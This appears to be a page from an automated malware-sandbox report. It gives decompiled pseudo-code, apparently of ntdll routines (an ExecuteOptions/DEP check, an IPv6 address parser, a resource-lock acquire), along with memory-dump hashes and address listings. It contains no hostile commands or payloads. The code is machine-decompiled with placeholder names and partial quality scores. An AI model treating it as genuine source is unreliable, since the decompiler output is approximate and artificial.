                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                      • Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
                                      • Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                      • Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025C7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E025C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2672088; // 0x768ef620
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0259DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E025A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E025A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0260E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E025E3F92();
					_t38 = 1;
					L2:
					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                      0x025c7f08
                                      0x025c7f0f
                                      0x025c7f12
                                      0x025c7f1b
                                      0x025c7f31
                                      0x025e3ead
                                      0x025e3eb4
                                      0x00000000
                                      0x00000000
                                      0x025e3eba
                                      0x025e3ecd
                                      0x025e3ed2
                                      0x025e3ee1
                                      0x025e3ee7
                                      0x025e3eec
                                      0x025e3f12
                                      0x025e3f18
                                      0x025e3f1a
                                      0x00000000
                                      0x00000000
                                      0x025e3f20
                                      0x025e3f26
                                      0x025e3f28
                                      0x00000000
                                      0x00000000
                                      0x025e3f2e
                                      0x025e3f30
                                      0x00000000
                                      0x00000000
                                      0x025e3f3a
                                      0x025e3f3b
                                      0x025e3f53
                                      0x025e3f64
                                      0x025e3f69
                                      0x025e3f6c
                                      0x025e3f6d
                                      0x025e3f6f
                                      0x025ee304
                                      0x025ee30f
                                      0x025ee315
                                      0x025ee31e
                                      0x025ee321
                                      0x025ee327
                                      0x025ee329
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025ee32f
                                      0x025ee32f
                                      0x025ee337
                                      0x025ee33a
                                      0x025ee33b
                                      0x025ee33d
                                      0x025ee33f
                                      0x025ee341
                                      0x025ee341
                                      0x025ee34e
                                      0x025ee353
                                      0x025ee358
                                      0x025ee35d
                                      0x025ee35f
                                      0x00000000
                                      0x00000000
                                      0x025ee365
                                      0x025ee365
                                      0x025ee368
                                      0x025ee36e
                                      0x00000000
                                      0x00000000
                                      0x025ee374
                                      0x025ee32f
                                      0x025e3f75
                                      0x025e3f7a
                                      0x025e3f7c
                                      0x025e3f7e
                                      0x025e3f86
                                      0x025c7f39
                                      0x025c7f47
                                      0x025c7f47
                                      0x025c7f37
                                      0x025c7f37
                                      0x00000000

                                      APIs
                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12
                                      Strings
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
                                      • Execute=1, xrefs: 025E3F5E
                                      • ExecuteOptions, xrefs: 025E3F04
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: BaseDataModuleQuery
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 3901378454-484625025
                                      • Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                      • Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
                                      • Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                      • Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025D0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E025D0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E025D0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E025D0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E025D0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                      0x025d0b21
                                      0x025d0b24
                                      0x025d0b27
                                      0x025d0b2a
                                      0x025d0b2d
                                      0x025d0b30
                                      0x025d0b33
                                      0x025d0b36
                                      0x025d0b39
                                      0x025d0b3e
                                      0x025d0c65
                                      0x025d0c68
                                      0x025d0c6a
                                      0x025d0c6f
                                      0x025feb42
                                      0x00000000
                                      0x00000000
                                      0x025feb48
                                      0x025feb48
                                      0x025d0c75
                                      0x025d0c7a
                                      0x025feb54
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025feb5a
                                      0x025d0c80
                                      0x025d0c84
                                      0x025feb98
                                      0x00000000
                                      0x00000000
                                      0x025feba6
                                      0x025d0cb8
                                      0x025d0cba
                                      0x025d0cd3
                                      0x025d0cda
                                      0x025d0ce4
                                      0x025d0ce9
                                      0x00000000
                                      0x025d0cec
                                      0x025d0c8c
                                      0x025feb63
                                      0x00000000
                                      0x00000000
                                      0x025feb70
                                      0x025feb75
                                      0x025feb7d
                                      0x00000000
                                      0x00000000
                                      0x025feb8c
                                      0x00000000
                                      0x025feb8c
                                      0x025d0c96
                                      0x00000000
                                      0x00000000
                                      0x025d0ca2
                                      0x025d0cac
                                      0x025d0cb4
                                      0x00000000
                                      0x00000000
                                      0x025d0b44
                                      0x025d0b47
                                      0x025d0b49
                                      0x00000000
                                      0x00000000
                                      0x025d0b4f
                                      0x025d0b50
                                      0x00000000
                                      0x00000000
                                      0x025d0b56
                                      0x025d0b62
                                      0x025d0b7c
                                      0x025d0bac
                                      0x025d0a0f
                                      0x025feaaa
                                      0x00000000
                                      0x025feac4
                                      0x025feac4
                                      0x025d0bd0
                                      0x025d0bd0
                                      0x025d0bd4
                                      0x025d0bd9
                                      0x00000000
                                      0x00000000
                                      0x025d0bdb
                                      0x025d0be0
                                      0x025feb0e
                                      0x025d0a1a
                                      0x00000000
                                      0x025d0a1a
                                      0x025feb1a
                                      0x025feb1f
                                      0x025feb27
                                      0x00000000
                                      0x00000000
                                      0x025feb36
                                      0x00000000
                                      0x025feb36
                                      0x025d0bea
                                      0x00000000
                                      0x00000000
                                      0x025d0bf6
                                      0x025d0c00
                                      0x025d0c03
                                      0x025d0c0b
                                      0x00000000
                                      0x025d0c0b
                                      0x025feaaa
                                      0x00000000
                                      0x025d0a15
                                      0x025d0bb6
                                      0x00000000
                                      0x025d0bc6
                                      0x025d0bc6
                                      0x025d0bcb
                                      0x025d0c15
                                      0x00000000
                                      0x00000000
                                      0x025d0c1d
                                      0x025d0c20
                                      0x025d0c21
                                      0x025d0c24
                                      0x025d0c24
                                      0x025d0c26
                                      0x00000000
                                      0x025d0c26
                                      0x025d0bcd
                                      0x00000000
                                      0x025d0bcd
                                      0x025d0b89
                                      0x025d0b89
                                      0x025d0b90
                                      0x00000000
                                      0x00000000
                                      0x025d0b96
                                      0x00000000
                                      0x025d0b96
                                      0x025d0a04
                                      0x025d0a04
                                      0x025d0b9a
                                      0x025d0b9a
                                      0x025d0b9b
                                      0x025d0b9f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025d0ba5
                                      0x025d0ac7
                                      0x025d0aca
                                      0x025feacf
                                      0x00000000
                                      0x025feade
                                      0x025feade
                                      0x025feae3
                                      0x00000000
                                      0x00000000
                                      0x025feaf3
                                      0x025feaf6
                                      0x025feaf7
                                      0x025feafe
                                      0x025feb01
                                      0x00000000
                                      0x025feb01
                                      0x025feacf
                                      0x025d0ad0
                                      0x025d0ad4
                                      0x00000000
                                      0x00000000
                                      0x025d0ada
                                      0x025d0ae6
                                      0x025d0c34
                                      0x00000000
                                      0x025d0c47
                                      0x025d0c49
                                      0x025d0c4a
                                      0x025d0c4e
                                      0x025d0c51
                                      0x025d0c54
                                      0x025d0c57
                                      0x025d0c5a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025d0c60
                                      0x025d0afb
                                      0x025d0afe
                                      0x025d0b02
                                      0x025d0b05
                                      0x025d0b08
                                      0x00000000
                                      0x025d0b08
                                      0x025d0ae6
                                      0x025d0b44
                                      0x025d09f8
                                      0x025d09f8
                                      0x025d09f9
                                      0x00000000
                                      0x00000000
                                      0x025feaa0
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __fassign
                                      • String ID: .$:$:
                                      • API String ID: 3965848254-2308638275
                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025D0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 49%
                                      			E025D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
									_push(_t144);
									_push(0);
									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0261217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
												_push(_t138);
												_push(0);
												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0261217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E025E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E025B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E025B5329(_t110, _t138);
																return E025B53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                      0x025d055a
                                      0x025d055d
                                      0x025d0563
                                      0x025d0566
                                      0x025d05d8
                                      0x025d05e2
                                      0x025d05e5
                                      0x00000000
                                      0x025d05e7
                                      0x025d05e7
                                      0x025d05ea
                                      0x025d05f3
                                      0x025d05f3
                                      0x025d0568
                                      0x025d0568
                                      0x025d0568
                                      0x025d0569
                                      0x025d0569
                                      0x025d0569
                                      0x025d056b
                                      0x00000000
                                      0x00000000
                                      0x025f217f
                                      0x025f2183
                                      0x025f225b
                                      0x025f225f
                                      0x025f2189
                                      0x025f218c
                                      0x025f218f
                                      0x025f2194
                                      0x025f2199
                                      0x025f219d
                                      0x025f21a0
                                      0x025f21a2
                                      0x025f21ce
                                      0x025f21ce
                                      0x025f21ce
                                      0x025f21d0
                                      0x025f21d6
                                      0x025f21de
                                      0x025f21e2
                                      0x025f21e8
                                      0x025f21e9
                                      0x025f21ec
                                      0x025f21f1
                                      0x025f21f6
                                      0x00000000
                                      0x00000000
                                      0x025f21f8
                                      0x025f21fb
                                      0x025f2206
                                      0x025f220b
                                      0x025f220c
                                      0x025f2217
                                      0x025f2226
                                      0x025f222b
                                      0x025f222c
                                      0x025f222f
                                      0x025f2232
                                      0x025f2235
                                      0x025f2235
                                      0x025f223a
                                      0x025f223f
                                      0x025f2241
                                      0x025f2243
                                      0x025f2248
                                      0x025f2248
                                      0x025f224d
                                      0x025f224f
                                      0x025f2262
                                      0x025f2263
                                      0x025f2268
                                      0x025f2269
                                      0x025f2269
                                      0x025f2269
                                      0x025f226d
                                      0x00000000
                                      0x00000000
                                      0x025f2276
                                      0x025f2279
                                      0x025f227e
                                      0x025f2283
                                      0x025f2287
                                      0x025f228a
                                      0x025f228d
                                      0x025f228f
                                      0x025f22bc
                                      0x025f22bc
                                      0x025f22bc
                                      0x025f22be
                                      0x025f22c4
                                      0x025f22cc
                                      0x025f22d0
                                      0x025f22d6
                                      0x025f22d7
                                      0x025f22da
                                      0x025f22df
                                      0x025f22e4
                                      0x00000000
                                      0x00000000
                                      0x025f22e6
                                      0x025f22e9
                                      0x025f22f4
                                      0x025f22f9
                                      0x025f22fa
                                      0x025f2305
                                      0x025f2314
                                      0x025f2319
                                      0x025f231a
